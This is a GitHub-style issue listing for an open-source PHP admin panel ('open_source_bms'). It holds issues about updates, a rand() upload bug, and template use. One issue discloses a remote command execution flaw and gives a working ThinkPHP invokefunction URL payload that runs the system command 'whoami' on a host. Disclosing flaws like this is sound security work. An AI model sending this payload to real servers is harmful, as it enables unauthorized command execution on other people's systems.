open_source_bms icon indicating copy to clipboard operation
open_source_bms copied to clipboard

verified publisher icon xyl-tools

Metadata

Open Source BMS 后台管理系统

Results 5 open_source_bms issues
Sort by recently updated
recently updated
newest added

There is A RCE vulnerability in your system.

2 comment

The RCE(Remote Command Execution) vulnerability is triggered by a http request.Successfully executed the command "whoami". poc: http://58.82.XXX.XXX:8080/public//?s=index/\think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=whoami ![default](https://user-images.githubusercontent.com/35087753/51068849-10bc7080-165f-11e9-81b7-0241880eec1c.png) ![default](https://user-images.githubusercontent.com/35087753/51068859-2d58a880-165f-11e9-9b11-3d9feff8c0a8.png)

CCkiller avatar CCkiller

老哥,这个站点现在是你在写的嘛,还是别人借用你的模板

2 comment

http://dyh.fsxy.com/

Youao1020 avatar Youao1020

啥时候更新啊

1、更新最新的layui 2、分页bug 3、菜单管理的分页

Tiamo1221 avatar Tiamo1221

加油

似乎没咋更新了,支持一下,加油

kingyangcn avatar kingyangcn

php7.0 7.1 编辑器上传图片爆rand() expects parameter 2 to be integer, float given

检查是发现 UeditorUpload.php 文件的问题 $randNum = rand(1, 10000000000) . rand(1, 10000000000); 应该是 $randNum = rand(1, 10000).rand(1, 10000);

suifeng168 avatar suifeng168

Metadata

360
Stars
180
Forks
Watchers

Owner

verified publisher icon xyl-tools

Metadata

Open Source BMS 后台管理系统

Back